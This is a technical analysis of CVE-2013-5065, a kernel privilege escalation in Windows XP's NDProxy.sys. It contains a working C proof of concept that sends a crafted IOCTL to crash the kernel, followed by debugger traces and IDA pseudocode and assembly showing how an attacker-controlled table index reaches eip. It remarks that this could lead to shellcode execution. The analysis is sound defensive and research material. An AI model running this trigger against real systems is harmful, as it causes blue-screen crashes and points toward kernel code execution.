CVE-2013-5065 Microsoft NDProxy.sys Privilege Escalation
Description
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
Technical Analysis
A local kernel vulnerability in Windows XP was recently disclosed; it is reported to have been captured as a second 0day used alongside an Adobe 0day in an in-the-wild attack.
PoC
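#include <windows.h>
#include <stdio.h>

/*
 * Crash PoC for CVE-2013-5065 (NDProxy.sys on Windows XP SP2/SP3 and
 * Server 2003 SP2), reformatted from the pasted listing.
 *
 * From user mode it opens \\.\NDProxy and issues IOCTL 0x8fff23cc with an
 * input buffer whose DWORD at index 5 (byte offset 0x14) is 0x7030125 and
 * whose DWORD at index 7 (byte offset 0x1c) is 0x34.  Per the debugger
 * trace that follows, PxIODispatch subtracts 0x7030101 from the first value
 * (giving 0x24), turns it into a table offset (0x24 * 3 * 4 = 0x1b0) and
 * makes an indirect call through that table, which lands on eip = 0x38 and
 * bugchecks.
 *
 * Defects fixed relative to the pasted listing: `void main` -> `int main(void)`;
 * a failed CreateFile no longer falls through to DeviceIoControl on
 * INVALID_HANDLE_VALUE; GetLastError() returns a DWORD, so it is printed
 * with %lu rather than %d; the DeviceIoControl result is checked; the input
 * length is derived from sizeof inbuf (0x15 * 4 = 0x54) instead of a
 * duplicated constant; garbled path and newline escapes are restored.
 *
 * Detection note: the user-mode-observable signature of this trigger is a
 * process opening \\.\NDProxy and issuing IOCTL 0x8fff23c8 or 0x8fff23cc,
 * the two codes the handler branch in the pseudocode accepts.
 *
 * Returns 0 after issuing the IOCTL, 1 if the device could not be opened.
 */
int main(void)
{
    /* Narrow-string entry point so the literal is correct whether or not UNICODE is defined. */
    HANDLE hDev = CreateFileA("\\\\.\\NDProxy",
                              GENERIC_READ | GENERIC_WRITE,
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL, OPEN_EXISTING, 0, NULL);
    if (hDev == INVALID_HANDLE_VALUE) {
        printf("CreateFile Error:%lu\n", GetLastError());
        return 1;
    }

    /* 0x15 DWORDs = 0x54 bytes; the handler rejects input/output lengths below 0x24. */
    DWORD inbuf[0x15] = { 0 };
    DWORD dwRetBytes = 0;
    inbuf[5] = 0x7030125; /* read at input+0x14: 0x7030125 - 0x7030101 = 0x24, the table index */
    inbuf[7] = 0x34;      /* read at input+0x1c: must not be below the table's entry (0x34) */

    /* The same buffer serves as input (0x54 bytes) and output (0x24 bytes), as in the original. */
    if (!DeviceIoControl(hDev, 0x8fff23cc, inbuf, sizeof inbuf, inbuf, 0x24, &dwRetBytes, NULL)) {
        printf("DeviceIoControl Error:%lu\n", GetLastError());
    }

    CloseHandle(hDev);
    return 0;
}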
Details
Compiling and running this directly on XP SP3 causes a blue screen; attaching the debugger shows the following exception:
Access violation - code c0000005 (!!! second chance !!!)
00000038 ??              ???
kd> r
eax=000001b0 ecx=00000000 ebx=81e16d80 edx=00000000 esi=81f31a30 edi=f88f273c
eip=00000038 esp=b203ec18 ebp=b203ec34 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
00000038 ??              ???
kd> kb
ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
b203ec14 f88ed145 81f31a30 81a76c10 81f2b2c0 0x38
b203ec34 804ef129 81f46ed8 000001b0 806d32d0 NDProxy!PxIODispatch+0x2b3
b203ec44 80575dde 81e16df0 81a76c10 81e16d80 nt!IopfCallDriver+0x31
b203ec58 80576c7f 81f46ed8 81e16d80 81a76c10 nt!IopSynchronousServiceTail+0x70
b203ed00 8056f4ec 000007e8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b203ed34 8053e648 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
b203ed34 7c92e4f4 000007e8 00000000 00000000 nt!KiFastCallEntry+0xf8
0012fe4c 7c92d26c 7c801675 000007e8 00000000 ntdll!KiFastSystemCallRet
0012fe50 7c801675 000007e8 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0012feb0 004010c2 000007e8 8fff23cc 0012ff28 0x7c801675
0012ff80 004012e9 00000001 00380fc0 00381058 0x4010c2
0012ffc0 7c817067 00241fe4 0012f7bc 7ffde000 0x4012e9
0012fff0 00000000 00401200 00000000 78746341 0x7c817067
Using IDA, locate the handler for this IOCTL code in PxIODispatch:
if (v7 == 0x8FFF23C8 || v7 == 0x8FFF23CC) {
  v17 = LockState;
  if (LockState < 0x24 || v6 < 0x24) {
    v8 = -1073741820;
    goto LABEL_70;
  }
  v18 = *(_DWORD *)(v5 + 20) - 117637377;
  v36 = 36;
  if ((unsigned int)v18 <= 0x24)
Restart, then break on the handler:
kd> bp NDProxy!PxIODispatch
kd> bl
 0 e f888ce92     0001 (0001) NDProxy!PxIODispatch
kd> g
Run the PoC; the breakpoint hits at the handler entry. Cross-referencing with IDA:
v36 = 0;
v2 = LockState;
v3 = *(_DWORD *)(LockState + 0x60);
v4 = *(_BYTE *)v3 == 14;
v5 = *(_DWORD *)(LockState + 0xC); // LockState + 0xC is exactly the InBuf pointer
LockState = *(_DWORD *)(v3 + 8);
v6 = *(_DWORD *)(v3 + 4);
v35 = *(_DWORD *)(v3 + 4);
kd> dd esp
b20b5c38 804ef129 8212b488 81b28ce8 806d32d0 b20b5c48 80575dde 81b28d58 81ace8a8 81b28ce8 b20b5c58 b20b5d00 80576c7f 8212b488 81b28ce8 b20b5c68 81ace8a8 0012ff00 b20b5d01 b20b5d01 b20b5c78 00000002 b20b5d64 0012fe80 8056f4c2 b20b5c88 80545edc 0012019f 00000000 00000003 00000012 c0100080 b20b5c98 8218aa28 00000e3c b20b5ca8 00000000 00000e40 00000000 81ace8ec
kd> dd 81b28ce8+0xC
81b28cf4 8212d490 8218ac38 8218ac38 00000000 00000000 01010001 0c000000 81b28d04 0012fe8c 81b28d14 00000000 00000000 00000000 00000000 00000000 00000000 00000000 81b28d24 0012ff28 81b28d34 8218aa28 00000000 00000000 00000000 00000000 81b28d58 81ace8a8 81b28d44 00000000 81b28d54 00000000 0005000e 00000024 00000054 00000000 8212b488 81ace8a8 81b28d64 8fff23cc
kd> dd 8212d490
8212d490 00000000 00000000 00000000 00000000 00000000 07030125 00000000 00000034 8212d4a0 8212d4b0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 8212d4c0 8212d4d0 00000000 00000000 00000000 00000000 8212d4e0 00000000 00000000 0001000c 81ecdbf0 8212d4f0 0a060001 ee657645 00000001 00000001 00000000 81e55408 00000000 821b6980 8212d500
Look directly at the code that handles this IOCTL:
if (m_iocode == 0x8FFF23C8 || m_iocode == 0x8FFF23CC) {
  v17 = LockState;
  if (LockState < 0x24 || v6 < 0x24) {
    v8 = 0xC0000004u;
    goto LABEL_70;
  }
  v18 = *(_DWORD *)(v5 + 0x14) - 0x7030101; // v5+0x14 == 0x7030125
  v36 = 36;
  if ((unsigned int)v18 <= 0x24) { // v18 == 0x24
    v19 = *(_DWORD *)(v5 + 0x1c); // v19 = 0x34
    v20 = 3 * v18;
    v21 = v19 < dword_F8892004[v20]; // dword_F8892004[v20] is exactly equal to 0x34
    LockState = v20 * 4; // v5 is assigned here
    if (v21 || v19 > v17 - 32) // skip this if
    {
      *(_DWORD *)(v5 + 16) = 0xC0012019u;
    }
    else // enter here
    {
      v22 = KfAcquireSpinLock(&SpinLock);
      byte_F8892740 = v22;
      if (TspCB) {
        LOBYTE(v23) = v22;
        KfReleaseSpinLock(&SpinLock, v23);
        *(_DWORD *)(v5 + 16) = 4097;
      } else {
        ++dword_F8892734;
        if ((unsigned int)dword_F8892734 > 0xFFFFFFFE)
          dword_F8892734 = -2147483647;
        *(_DWORD *)(v5 + 12) = dword_F8892734;
        *(_DWORD *)(v5 + 8) = v2;
        LOBYTE(v23) = byte_F8892740;
        KfReleaseSpinLock(&SpinLock, v23);
        *(_BYTE *)(*(_DWORD *)(v2 + 96) + 3) |= 1u;
        v24 = (*(int (__stdcall **)(int))((char *)&off_F8892008 + LockState))(v5); // the exception occurs here
        if (v24 == 259)
          return 259;
        v36 = v35;
        if (v35 >= *(_DWORD *)(v5 + 28) + 36)
          v36 = *(_DWORD *)(v5 + 28) + 36;
        *(_DWORD *)(v5 + 16) = v24;
        _InterlockedExchange((signed __int32 *)(v2 + 56), 0);
      }
    }
  }
}
The assembly is as follows:
.text:F885D0AD loc_F885D0AD:                  ; CODE XREF: PxIODispatch(x,x)+20D j
.text:F885D0AD     mov     ecx, [esi+1Ch]           ; esi+1Ch controllable
.text:F885D0B0     lea     eax, [eax+eax*2]         ; eax controllable
.text:F885D0B3     shl     eax, 2
.text:F885D0B6     cmp     ecx, dword_F8862004[eax]
.text:F885D0BC     mov     dword ptr [ebp+LockState.LockState], eax ; taints LockState.LockState
.text:F885D0BF     jnb     short loc_F885D0CD
.text:F885D0C1
.text:F885D0C1 loc_F885D0C1:                  ; CODE XREF: PxIODispatch(x,x)+240 j
.text:F885D0C1     mov     dword ptr [esi+10h], 0C0012019h
.text:F885D0C8     jmp     loc_F885D172
...
.text:F885D134     mov     eax, [ebx+60h]
.text:F885D137     or      byte ptr [eax+3], 1
.text:F885D13B     mov     eax, dword ptr [ebp+LockState.LockState] ; tainted eax
.text:F885D13E     push    esi
.text:F885D13F     call    off_F8862008[eax]        ; Exception! tainted eax used as a subscript into off_F8862008 and passed to eip
kd> g
Breakpoint 2 hit
NDProxy!PxIODispatch+0x2ad:
f885d13f ff90082086f8    call    dword ptr NDProxy!TapiOids+0x8 (f8862008)[eax]
kd> r
eax=000001b0 ecx=00000000 ebx=81e2c2f8 edx=00000000 esi=81cc9368 edi=f886273c
eip=f885d13f esp=b1bd9c1c ebp=b1bd9c34 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
NDProxy!PxIODispatch+0x2ad:
f885d13f ff90082086f8    call    dword ptr NDProxy!TapiOids+0x8 (f8862008)[eax] ds:0023:f88621b8=00000038
Here eax = 0x1b0, i.e. 0x24 * 3 * 4.
As for how to exploit this, it is not yet clear; for now, one can expect that being able to control the array index in eax to certain positions allows executing shellcode.
General Information
Vendors
- microsoft
Products
- windows 2003 server -,
- windows xp -
Exploited in the Wild